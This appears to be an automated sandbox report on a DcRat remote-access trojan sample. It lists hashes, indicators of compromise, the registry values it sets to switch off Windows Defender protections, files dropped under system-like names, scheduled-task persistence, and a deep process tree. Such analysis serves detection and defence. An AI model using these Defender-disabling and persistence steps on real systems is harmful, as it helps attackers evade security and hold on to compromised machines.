Analysis
- max time kernel: 150s
- max time network: 82s
- platform: windows10-1703_x64
- resource: win10-20240611-en
- resource tags: arch:x64 arch:x86 image:win10-20240611-en locale:en-us os:windows10-1703-x64 system
- submitted: 22-07-2024 19:02
Static task: static1
Behavioral task: behavioral1
- Sample: FunCheker.zip
- Resource: win10-20240404-en
Behavioral task: behavioral2
- Sample: FunCheker.exe
- Resource: win10-20240611-en
General
- Target: FunCheker.exe
- Size: 1.9MB
- MD5: a69f81ab8922f56e786c95000e4ea238
- SHA1: eec04e5776a155f4445260b46f8fa3b139ccedef
- SHA256: c36b87352873121329f10440ce883510be4c7d829d6afe7ee28664b79cddfd8d
- SHA512: de9a791be937925f0ab9d665e6282237f78b4b14f11e539bbcb9dd1ee95b0421a00ab841adb97ed3f41d3d92d94a569728edb486940afb690114bf825a42aeab
- SSDEEP: 49152:mIduhWrW/Si9FPOcS/up3M4vsEVXxQ4mxS5WDK:BuMr6zxSmp8Bi6I
Malware Config
Signatures
-
DcRat 55 IoCs
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Processes:
description ioc process
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" reg.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe
Key deleted \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe
-
Modifies security service 2 TTPs 1 IoCs
Processes:
description ioc process
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe
-
Process spawned unexpected child process 54 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
description pid pid_target process target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2928 68 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3080 68 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4476 68 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3332 68 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3192 68 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4256 68 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 672 68 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2008 68 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4856 68 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3324 68 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3872 68 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5100 68 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4272 68 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3236 68 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3316 68 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3124 68 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4320 68 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2028 68 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1284 68 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2664 68 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2084 68 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4492 68 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4620 68 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3596 68 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4672 68 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4184 68 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3708 68 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5012 68 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4396 68 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3232 68 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3116 68 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1680 68 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2788 68 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4268 68 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2060 68 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4756 68 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1808 68 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2076 68 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2392 68 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 316 68 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2780 68 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3244 68 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4040 68 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 704 68 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4340 68 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3764 68 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1836 68 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5004 68 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3484 68 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4724 68 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3468 68 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5020 68 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4116 68 schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2992 68 schtasks.exe
-
Processes:
resource yara_rule
C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe dcrat
C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe dcrat
behavioral2/memory/4944-36-0x0000000000A80000-0x0000000000CA4000-memory.dmp dcrat
-
Executes dropped EXE 22 IoCs
Processes:
pid process
4952 Micrasoft.exe
4944 comcommon.exe
4048 explorer.exe
4732 explorer.exe
3496 explorer.exe
3236 explorer.exe
4492 explorer.exe
5088 explorer.exe
4680 explorer.exe
4392 explorer.exe
2764 explorer.exe
4260 explorer.exe
976 explorer.exe
3188 explorer.exe
4452 explorer.exe
2700 explorer.exe
2760 explorer.exe
3636 explorer.exe
5000 explorer.exe
2952 explorer.exe
4256 explorer.exe
5020 explorer.exe
-
Drops file in Program Files directory 14 IoCs
Processes:
description ioc process
File created C:\Program Files (x86)\WindowsPowerShell\Configuration\dllhost.exe comcommon.exe
File created C:\Program Files\Windows Multimedia Platform\cc11b995f2a76d comcommon.exe
File created C:\Program Files (x86)\Internet Explorer\images\ebf1f9fa8afd6d comcommon.exe
File created C:\Program Files (x86)\WindowsPowerShell\Configuration\5940a34987c991 comcommon.exe
File created C:\Program Files\Windows NT\TableTextService\dllhost.exe comcommon.exe
File created C:\Program Files\Windows NT\TableTextService\5940a34987c991 comcommon.exe
File created C:\Program Files (x86)\Windows Mail\en-US\6dd19aba3e2428 comcommon.exe
File created C:\Program Files\Windows Multimedia Platform\winlogon.exe comcommon.exe
File created C:\Program Files (x86)\Internet Explorer\images\cmd.exe comcommon.exe
File created C:\Program Files\Uninstall Information\comcommon.exe comcommon.exe
File created C:\Program Files\Uninstall Information\a1e76cf482601b comcommon.exe
File created C:\Program Files (x86)\Windows Mail\en-US\ApplicationFrameHost.exe comcommon.exe
File created C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\wininit.exe comcommon.exe
File created C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\56085415360792 comcommon.exe
-
Drops file in Windows directory 6 IoCs
Processes:
description ioc process
File created C:\Windows\SchCache\ebf1f9fa8afd6d comcommon.exe
File created C:\Windows\en-US\csrss.exe comcommon.exe
File created C:\Windows\en-US\886983d96e3d3e comcommon.exe
File created C:\Windows\uk-UA\sppsvc.exe comcommon.exe
File created C:\Windows\uk-UA\0a1fd5f707cd16 comcommon.exe
File created C:\Windows\SchCache\cmd.exe comcommon.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 24 IoCs
Processes:
description ioc process
Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings explorer.exe
Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings explorer.exe
Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings explorer.exe
Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings explorer.exe
Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings explorer.exe
Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings Micrasoft.exe
Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings explorer.exe
Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings explorer.exe
Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings explorer.exe
Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings explorer.exe
Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings explorer.exe
Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings explorer.exe
Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings explorer.exe
Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings explorer.exe
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP reg.exe
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP reg.exe
Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings comcommon.exe
Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings explorer.exe
Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings explorer.exe
Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings explorer.exe
Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings explorer.exe
Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings explorer.exe
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP reg.exe
Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings explorer.exe
-
Scheduled Task/Job: Scheduled Task 1 TTPs 54 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 37 IoCs
-
Suspicious use of AdjustPrivilegeToken 21 IoCs
Processes:
description pid process
Token: SeDebugPrivilege 4944 comcommon.exe
Token: SeDebugPrivilege 4048 explorer.exe
Token: SeDebugPrivilege 4732 explorer.exe
Token: SeDebugPrivilege 3496 explorer.exe
Token: SeDebugPrivilege 3236 explorer.exe
Token: SeDebugPrivilege 4492 explorer.exe
Token: SeDebugPrivilege 5088 explorer.exe
Token: SeDebugPrivilege 4680 explorer.exe
Token: SeDebugPrivilege 4392 explorer.exe
Token: SeDebugPrivilege 2764 explorer.exe
Token: SeDebugPrivilege 4260 explorer.exe
Token: SeDebugPrivilege 976 explorer.exe
Token: SeDebugPrivilege 3188 explorer.exe
Token: SeDebugPrivilege 4452 explorer.exe
Token: SeDebugPrivilege 2700 explorer.exe
Token: SeDebugPrivilege 2760 explorer.exe
Token: SeDebugPrivilege 3636 explorer.exe
Token: SeDebugPrivilege 5000 explorer.exe
Token: SeDebugPrivilege 2952 explorer.exe
Token: SeDebugPrivilege 4256 explorer.exe
Token: SeDebugPrivilege 5020 explorer.exe
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
description pid process target process
PID 4756 wrote to memory of 4952 4756 FunCheker.exe Micrasoft.exe
PID 4756 wrote to memory of 4952 4756 FunCheker.exe Micrasoft.exe
PID 4756 wrote to memory of 4952 4756 FunCheker.exe Micrasoft.exe
PID 4756 wrote to memory of 2280 4756 FunCheker.exe cmd.exe
PID 4756 wrote to memory of 2280 4756 FunCheker.exe cmd.exe
PID 4756 wrote to memory of 3800 4756 FunCheker.exe cmd.exe
PID 4756 wrote to memory of 3800 4756 FunCheker.exe cmd.exe
PID 4756 wrote to memory of 3228 4756 FunCheker.exe cmd.exe
PID 4756 wrote to memory of 3228 4756 FunCheker.exe cmd.exe
PID 3800 wrote to memory of 2076 3800 cmd.exe chcp.com
PID 3800 wrote to memory of 2076 3800 cmd.exe chcp.com
PID 3228 wrote to memory of 4748 3228 cmd.exe reg.exe
PID 3228 wrote to memory of 4748 3228 cmd.exe reg.exe
PID 3228 wrote to memory of 3640 3228 cmd.exe reg.exe
PID 3228 wrote to memory of 3640 3228 cmd.exe reg.exe
PID 3228 wrote to memory of 316 3228 cmd.exe reg.exe
PID 3228 wrote to memory of 316 3228 cmd.exe reg.exe
PID 3228 wrote to memory of 208 3228 cmd.exe reg.exe
PID 3228 wrote to memory of 208 3228 cmd.exe reg.exe
PID 3228 wrote to memory of 1888 3228 cmd.exe reg.exe
PID 3228 wrote to memory of 1888 3228 cmd.exe reg.exe
PID 3228 wrote to memory of 2784 3228 cmd.exe reg.exe
PID 3228 wrote to memory of 2784 3228 cmd.exe reg.exe
PID 3228 wrote to memory of 4676 3228 cmd.exe reg.exe
PID 3228 wrote to memory of 4676 3228 cmd.exe reg.exe
PID 3228 wrote to memory of 704 3228 cmd.exe reg.exe
PID 3228 wrote to memory of 704 3228 cmd.exe reg.exe
PID 3228 wrote to memory of 1844 3228 cmd.exe reg.exe
PID 3228 wrote to memory of 1844 3228 cmd.exe reg.exe
PID 3228 wrote to memory of 1652 3228 cmd.exe reg.exe
PID 3228 wrote to memory of 1652 3228 cmd.exe reg.exe
PID 3228 wrote to memory of 4948 3228 cmd.exe reg.exe
PID 3228 wrote to memory of 4948 3228 cmd.exe reg.exe
PID 3228 wrote to memory of 800 3228 cmd.exe reg.exe
PID 3228 wrote to memory of 800 3228 cmd.exe reg.exe
PID 4952 wrote to memory of 2256 4952 Micrasoft.exe WScript.exe
PID 4952 wrote to memory of 2256 4952 Micrasoft.exe WScript.exe
PID 4952 wrote to memory of 2256 4952 Micrasoft.exe WScript.exe
PID 3228 wrote to memory of 3484 3228 cmd.exe reg.exe
PID 3228 wrote to memory of 3484 3228 cmd.exe reg.exe
PID 3228 wrote to memory of 4688 3228 cmd.exe reg.exe
PID 3228 wrote to memory of 4688 3228 cmd.exe reg.exe
PID 3228 wrote to memory of 5020 3228 cmd.exe reg.exe
PID 3228 wrote to memory of 5020 3228 cmd.exe reg.exe
PID 3228 wrote to memory of 3916 3228 cmd.exe schtasks.exe
PID 3228 wrote to memory of 3916 3228 cmd.exe schtasks.exe
PID 3228 wrote to memory of 3396 3228 cmd.exe schtasks.exe
PID 3228 wrote to memory of 3396 3228 cmd.exe schtasks.exe
PID 3228 wrote to memory of 2020 3228 cmd.exe schtasks.exe
PID 3228 wrote to memory of 2020 3228 cmd.exe schtasks.exe
PID 3228 wrote to memory of 3556 3228 cmd.exe schtasks.exe
PID 3228 wrote to memory of 3556 3228 cmd.exe schtasks.exe
PID 3228 wrote to memory of 2088 3228 cmd.exe schtasks.exe
PID 3228 wrote to memory of 2088 3228 cmd.exe schtasks.exe
PID 3228 wrote to memory of 3024 3228 cmd.exe reg.exe
PID 3228 wrote to memory of 3024 3228 cmd.exe reg.exe
PID 3228 wrote to memory of 440 3228 cmd.exe reg.exe
PID 3228 wrote to memory of 440 3228 cmd.exe reg.exe
PID 3228 wrote to memory of 4940 3228 cmd.exe reg.exe
PID 3228 wrote to memory of 4940 3228 cmd.exe reg.exe
PID 3228 wrote to memory of 2260 3228 cmd.exe reg.exe
PID 3228 wrote to memory of 2260 3228 cmd.exe reg.exe
PID 3228 wrote to memory of 4600 3228 cmd.exe reg.exe
PID 3228 wrote to memory of 4600 3228 cmd.exe reg.exe
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\FunCheker.exe "C:\Users\Admin\AppData\Local\Temp\FunCheker.exe" 1⤵
- Suspicious use of WriteProcessMemory
PID:4756 -
C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe "C:\Users\Admin\AppData\Local\Temp\Micrasoft.exe" 2⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4952 -
C:\Windows\SysWOW64\WScript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\kXeJA.vbe" 3⤵ PID:2256
-
C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\ZqKnM.bat" " 4⤵ PID:1476
-
C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe "C:\Users\Admin\AppData\Roaming\driverbrokerDhcp\comcommon.exe" 5⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4944 -
C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\iQWRCQKxyP.bat" 6⤵ PID:3584
-
C:\Windows\system32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 7⤵ PID:4088
-
-
C:\Recovery\WindowsRE\explorer.exe "C:\Recovery\WindowsRE\explorer.exe" 7⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4048 -
C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\eUivgxqvfs.bat" 8⤵ PID:4564
-
C:\Windows\system32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 9⤵ PID:4624
-
-
C:\Recovery\WindowsRE\explorer.exe "C:\Recovery\WindowsRE\explorer.exe" 9⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4732 -
C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Jobc5AEC9X.bat" 10⤵ PID:4180
-
C:\Windows\system32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 11⤵ PID:3440
-
-
C:\Recovery\WindowsRE\explorer.exe "C:\Recovery\WindowsRE\explorer.exe" 11⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3496 -
C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\F4MZx53eLu.bat" 12⤵ PID:2276
-
C:\Windows\system32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 13⤵ PID:3872
-
-
C:\Recovery\WindowsRE\explorer.exe "C:\Recovery\WindowsRE\explorer.exe" 13⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3236 -
C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\guIa2jZB2U.bat" 14⤵ PID:1284
-
C:\Windows\system32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 15⤵ PID:4104
-
-
C:\Recovery\WindowsRE\explorer.exe "C:\Recovery\WindowsRE\explorer.exe" 15⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4492 -
C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\KxKP0srito.bat" 16⤵ PID:4560
-
C:\Windows\system32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 17⤵ PID:3232
-
-
C:\Recovery\WindowsRE\explorer.exe "C:\Recovery\WindowsRE\explorer.exe" 17⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5088 -
C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\b3FUfZROOv.bat" 18⤵ PID:4036
-
C:\Windows\system32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 19⤵ PID:2076
-
-
C:\Recovery\WindowsRE\explorer.exe "C:\Recovery\WindowsRE\explorer.exe" 19⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4680 -
C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\SK7IuFDp7o.bat" 20⤵ PID:228
-
C:\Windows\system32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 21⤵ PID:5040
-
-
C:\Recovery\WindowsRE\explorer.exe "C:\Recovery\WindowsRE\explorer.exe" 21⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4392 -
C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\wtOcRLEbie.bat" 22⤵ PID:5072
-
C:\Windows\system32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 23⤵ PID:5000
-
-
C:\Recovery\WindowsRE\explorer.exe "C:\Recovery\WindowsRE\explorer.exe" 23⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2764 -
C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\avPRQTW9Zy.bat" 24⤵ PID:320
-
C:\Windows\system32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 25⤵ PID:2604
-
-
C:\Recovery\WindowsRE\explorer.exe "C:\Recovery\WindowsRE\explorer.exe" 25⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4260 -
C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\K3fI8Bd254.bat" 26⤵ PID:1516
-
C:\Windows\system32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 27⤵ PID:4256
-
-
C:\Recovery\WindowsRE\explorer.exe "C:\Recovery\WindowsRE\explorer.exe" 27⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:976 -
C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\a1rZrAbBst.bat" 28⤵ PID:2852
-
C:\Windows\system32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 29⤵ PID:2328
-
-
C:\Recovery\WindowsRE\explorer.exe "C:\Recovery\WindowsRE\explorer.exe" 29⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3188 -
C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\lg1oIatdTn.bat" 30⤵ PID:1284
-
C:\Windows\system32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 31⤵ PID:3568
-
-
C:\Recovery\WindowsRE\explorer.exe "C:\Recovery\WindowsRE\explorer.exe" 31⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4452 -
C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\AKY6NrPTox.bat" 32⤵ PID:1508
-
C:\Windows\system32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 33⤵ PID:1416
-
-
C:\Recovery\WindowsRE\explorer.exe "C:\Recovery\WindowsRE\explorer.exe" 33⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2700 -
C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\T7QXgceCiI.bat" 34⤵ PID:4932
-
C:\Windows\system32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 35⤵ PID:3196
-
-
C:\Recovery\WindowsRE\explorer.exe "C:\Recovery\WindowsRE\explorer.exe" 35⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2760 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\vhzsSyDvNE.bat"36⤵PID:200
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:237⤵PID:1476
-
-
C:\Recovery\WindowsRE\explorer.exe"C:\Recovery\WindowsRE\explorer.exe"37⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3636 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\S2GQUB77UU.bat"38⤵PID:3584
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:239⤵PID:32
-
-
C:\Recovery\WindowsRE\explorer.exe"C:\Recovery\WindowsRE\explorer.exe"39⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5000 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\blOcFVMglb.bat"40⤵PID:3136
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:241⤵PID:2764
-
-
C:\Recovery\WindowsRE\explorer.exe"C:\Recovery\WindowsRE\explorer.exe"41⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2952 -
